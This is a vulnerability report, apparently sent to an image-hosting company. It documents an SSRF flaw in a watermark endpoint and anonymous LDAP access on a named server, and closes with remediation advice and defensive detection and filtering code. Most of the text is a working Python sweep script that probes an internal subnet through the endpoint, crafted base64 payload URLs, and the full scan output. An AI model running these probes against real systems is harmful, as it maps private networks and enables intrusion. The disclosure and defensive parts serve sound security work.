I. SSRF vulnerability

The vulnerable host appears to be a demo site: http://demos.qiniu.com/demo/qimage/index.html

The endpoint with the SSRF vulnerability first fetches a remote image and then composites it as a watermark over the current image. Using Baidu's logo as a demonstration, the effect looks like this:
http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

The base64 string after image is the IP and port you want to probe. How do you learn an internal IP in the first place? In this case one of Qiniu's IPs was found to expose Elasticsearch without authentication.

From that we know the internal network contains at least the following segment:

172.30.251.168:9200

Base64-encode http://172.30.251.168:9200 and place it after image:

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast

If the IP is alive and the port is open, a 501 error is returned, e.g. when probing http://172.30.251.168:9200

If the IP is not alive or the port is closed, a 502 error is returned, e.g. when probing http://172.30.251.168:1356

Testing yields the following rules:

Returns 403: IP alive and port open, but access to that path is forbidden
Returns 404: IP alive and port open, but the image does not exist
Returns 501: IP alive and port open
Returns 502: IP not alive or port closed

To make testing easier, I wrote a script that probes whether port 80 is open across the 172.30.251.0/24 segment; any response carrying a 501 error means the IP is alive and the port is open. Going a step further, one could identify which application a target runs by probing for its default logo or favicon.ico.

#coding=utf-8
'''
poc: qiniu_ssrf
url: http://demos.qiniu.com/demo/qimage/index.html
'''
# Python 2 script: walks 172.30.251.0/24, submits each address as the
# watermark image URL and records the endpoint's response per IP.
import requests
import base64
from IPy import IP

mask = IP('172.30.251.0/24')
for ip in mask:
    print ip
    # the image parameter is the base64 of the URL to fetch (port 80, no path)
    b64Domain = base64.b64encode('http://' + str(ip))
    #print b64Domain
    req = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)
    print req.text + "\n"
    # append "<ip>\n<response>\n\n" to the scan log
    qnfile = file('/tmp/qnscan.txt', 'a')
    qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')
    qnfile.close()

These are the results returned:

172.30.251.0
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.1
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.2
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.3
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.4
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.5
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.6
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.7
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.8
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.9
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.10
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.11
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.12
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.13
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.14
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.15
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.16
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.17
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.18
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.19
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.20
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.21
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.22
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.23
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.24
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.25
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.26
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.27
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.28
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.29
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.30
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.31
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.32
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.33
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.34
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.35
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.36
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.37
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.38
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.39
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.40
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.41
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.42
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.43
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.44
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.45
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.46
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.47
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.48
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.49
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.50
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.51
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.52
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.53
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.54
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.55
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.56
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.57
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.58
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.59
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.60
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.61
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.62
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.63
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.64
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.65
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.66
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.67
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.68
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.69
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.70
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.71
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.72
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.73
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.74
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.75
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.76
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.77
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.78
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.79
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.80
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.81
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.82
{"error":"fetch image url failed and statusCode: 503"}
172.30.251.83
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.84
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.85
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.86
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.87
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.88
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.89
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.90
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.91
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.92
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.93
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.94
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.95
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.96
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.97
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.98
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.99
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.100
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.101
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.102
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.103
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.104
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.105
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.106
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.107
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.108
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.109
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.110
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.111
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.112
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.113
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.114
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.115
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.116
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.117
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.118
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.119
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.120
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.121
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.122
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.123
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.124
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.125
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.126
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.127
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.128
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.129
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.130
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.131
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.132
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.133
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.134
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.135
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.136
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.137
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.138
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.139
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.140
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.141
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.142
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.143
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.144
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.145
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.146
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.147
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.148
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.149
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.150
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.151
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.152
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.153
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.154
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.155
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.156
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.157
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.158
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.159
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.160
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.161
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.162
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.163
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.164
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.165
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.166
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.167
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.168
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.169
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.170
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.171
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.172
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.173
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.174
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.175
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.176
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.177
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.178
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.179
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.180
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.181
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.182
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.183
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.184
{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}
172.30.251.185
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.186
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.187
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.188
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.189
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.190
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.191
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.192
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.193
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.194
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.195
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.196
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.197
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.198
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.199
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.200
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.201
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.202
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.203
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.204
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.205
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.206
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.207
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.208
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.209
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.210
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.211
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.212
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.213
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.214
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.215
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.216
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.217
{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}
172.30.251.218
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.219
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.220
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.221
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.222
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.223
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.224
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.225
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.226
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.227
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.228
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.229
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.230
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.231
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.232
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.233
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.234
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.235
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.236
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.237
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.238
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.239
{"error":"fetch image url failed and statusCode: 404"}
172.30.251.240
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.241
{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}
172.30.251.242
{"error":"fetch image url failed and statusCode: 403"}
172.30.251.243
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.244
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.245
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.246
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.247
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.248
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.249
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.250
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.251
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.252
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.253
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.254
{"error":"fetch image url failed and statusCode: 502"}
172.30.251.255
{"error":"fetch image url failed and statusCode: 502"}
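
A sweep like the one above leaves an obvious trail in the watermark endpoint's own access log: one client issuing a burst of requests whose image parameter decodes to consecutive private addresses. The following is an added detection example, not code from the original report or from Qiniu; the log format and every log line are constructed for the example, and only the URL layout (…/image/<base64>/dissolve/…) is taken from the report. It decodes the image segment of each request, classifies the target address with the ipaddress module, and reports clients that aimed the fetcher at several distinct internal targets.

```python
# Added example (not from the original report): detection logic that spots
# the scanning pattern above in the watermark endpoint's access log. The
# log format and every log line are constructed for this example; the URL
# layout (.../image/<base64>/dissolve/...) follows the report.
import base64
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

# nginx/Apache "combined"-style line; only client, path and status are used.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# The base64 segment after /image/. It is a URL path segment, so it ends at
# the next "/" (the report's examples contain no "/" inside the base64).
IMAGE_RE = re.compile(r'/image/([A-Za-z0-9+_=-]+)')


def decode_image_param(b64):
    """Decode the 'image' segment; accepts standard and URL-safe alphabets."""
    try:
        padded = b64 + "=" * (-len(b64) % 4)
        return base64.urlsafe_b64decode(padded).decode("utf-8", "replace")
    except ValueError:
        return None


def is_internal(ip):
    """Loopback, RFC 1918, link-local (incl. 169.254.169.254), multicast,
    reserved and unspecified addresses, v4 or v6."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def target_of(path):
    """(host, port, internal) for the image URL embedded in a request path,
    or None if the path carries no decodable image parameter. Host names are
    reported with internal=False: judging them needs the resolver, not the log."""
    m = IMAGE_RE.search(path)
    if not m:
        return None
    url = decode_image_param(m.group(1))
    if url is None:
        return None
    parts = urlsplit(url)
    if not parts.hostname:
        return None
    try:
        port = parts.port
    except ValueError:
        port = None
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return (parts.hostname, port, False)
    return (parts.hostname, port, is_internal(ip))


def find_internal_scans(log_text, threshold=5):
    """Clients whose requests aimed the fetcher at >= threshold distinct
    internal host:port targets. One internal hit may be a misconfigured
    integration; a sweep is the signature of the probe described above."""
    per_client = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        t = target_of(m.group("path"))
        if t and t[2]:
            per_client[m.group("client")].add((t[0], t[1]))
    return {client: sorted(targets, key=lambda hp: (hp[0], hp[1] or 0))
            for client, targets in per_client.items() if len(targets) >= threshold}


def _log_line(client, image_url, status):
    """Constructed sample line in the shape LOG_RE expects."""
    b64 = base64.urlsafe_b64encode(image_url.encode()).decode()
    return ('%s - - [01/Jan/2016:10:00:00 +0800] "GET /1234.jpg?watermark/1/image/%s'
            '/dissolve/100/gravity/SouthEast HTTP/1.1" %d 61' % (client, b64, status))


# Constructed sample log: a normal user (203.0.113.7), one client walking
# 172.30.251.0/24 plus the Elasticsearch port (198.51.100.9), and a single
# loopback request that stays under the threshold (203.0.113.8).
SAMPLE_LOG = "\n".join(
    [_log_line("203.0.113.7", "https://www.baidu.com/img/bd_logo1.png", 200)] * 2
    + [_log_line("198.51.100.9", "http://172.30.251.%d" % i, 400) for i in range(8)]
    + [_log_line("198.51.100.9", "http://172.30.251.168:9200", 400)]
    + [_log_line("203.0.113.8", "http://127.0.0.1/x.png", 400)]
)

if __name__ == "__main__":
    for client, targets in find_internal_scans(SAMPLE_LOG).items():
        print(client, "probed", len(targets), "internal targets, e.g.", targets[:3])
```

Run against the constructed log, only 198.51.100.9 is reported (nine distinct internal targets); the lone loopback request from 203.0.113.8 stays under the threshold. Host names are deliberately not classified from the log alone, since whether a name points inside the network is only known at resolution time; that check belongs in the fetcher itself.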

II. Anonymous LDAP access

IP: 115.231.182.75
Port: 389

All of the company's personnel information can be retrieved, and that information can be used to brute-force mailboxes or applications that authenticate via LDAP.

During testing, an Onion (洋葱) application you had set up (115.231.182.75:8090) had a vulnerability and I accidentally knocked it over while testing; I sincerely apologize.

Remediation

1. SSRF vulnerability: unify the returned error messages so that a user cannot infer the port state of a remote server from the error, and forbid the server from fetching URLs that point at internal IP addresses.
2. LDAP vulnerability: disable anonymous LDAP access.
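
Both halves of the SSRF fix in working code, as an added example that is not Qiniu's code and not part of the original report; the function and parameter names are assumptions for the example. Note what the results above actually leak: the "501" the report keys on is the tail of an ImageMagick error string (a fetch that succeeded but returned non-image bytes), while unreachable hosts produce a distinct "statusCode: 502" body. The difference between those two bodies is the information channel, and a single fixed error body closes it; the address check in front of the fetch removes the internal targets altogether.

```python
# Added example (not Qiniu's code): the two remediation points above in code.
# A watermark-style fetcher (1) refuses image URLs that point at internal
# addresses and (2) returns one fixed error body for every failure, so the
# response no longer reveals whether an internal host/port answered.
# Function and parameter names here are assumptions for the example.
import base64
import ipaddress
import socket
from urllib.parse import urlsplit

# One body for every failure; the real cause is logged server-side only.
UNIFORM_ERROR = {"error": "fetch image failed"}
ALLOWED_SCHEMES = ("http", "https")
ALLOWED_PORTS = (None, 80, 443)   # None = the scheme's default port


def is_internal(ip_text):
    """True for loopback, RFC 1918, link-local (incl. 169.254.169.254),
    multicast, reserved and unspecified addresses, v4 or v6."""
    ip = ipaddress.ip_address(ip_text)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_all(host):
    """Every address a host maps to. IP literals are returned as-is (no DNS);
    names go through the system resolver."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def encode_image_param(url):
    """Build the base64 'image' segment used in the watermark URL."""
    return base64.urlsafe_b64encode(url.encode()).decode()


def check_image_param(b64_param, resolver=resolve_all):
    """Decode the 'image' segment and decide whether fetching it is allowed.
    Returns (allowed, reason); `reason` is for the server log, never the client."""
    try:
        padded = b64_param + "=" * (-len(b64_param) % 4)
        url = base64.urlsafe_b64decode(padded).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return False, "image parameter is not valid base64/UTF-8"
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    if not parts.hostname:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %d" % port
    addrs = resolver(parts.hostname)
    if not addrs:
        return False, "host does not resolve"
    # Reject if ANY resolved address is internal: a name that mixes public
    # and private records must not get through on the public one.
    for addr in addrs:
        if is_internal(addr):
            return False, "%s resolves to internal address %s" % (parts.hostname, addr)
    return True, "ok"


def handle_watermark(b64_param, resolver=resolve_all):
    """What the endpoint returns to the client for the image parameter:
    either a go-ahead or UNIFORM_ERROR, never the upstream status code."""
    allowed, reason = check_image_param(b64_param, resolver)
    if not allowed:
        # log `reason` here; the client sees the same body for every cause
        return UNIFORM_ERROR
    return {"ok": True}


if __name__ == "__main__":
    for url in ("http://172.30.251.168:9200", "http://172.30.251.168:1356",
                "http://169.254.169.254/latest/meta-data/"):
        print(url, "->", handle_watermark(encode_image_param(url)))
```

The resolver is injectable so the check can be unit-tested offline with a fake. Two caveats a reviewer would raise: the check resolves the name once and the HTTP client resolves it again, so a name that changes its answer between the two (DNS rebinding) can slip past unless the fetch is pinned to the vetted address; and every redirect hop the fetcher follows is a new URL that must go through the same check.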
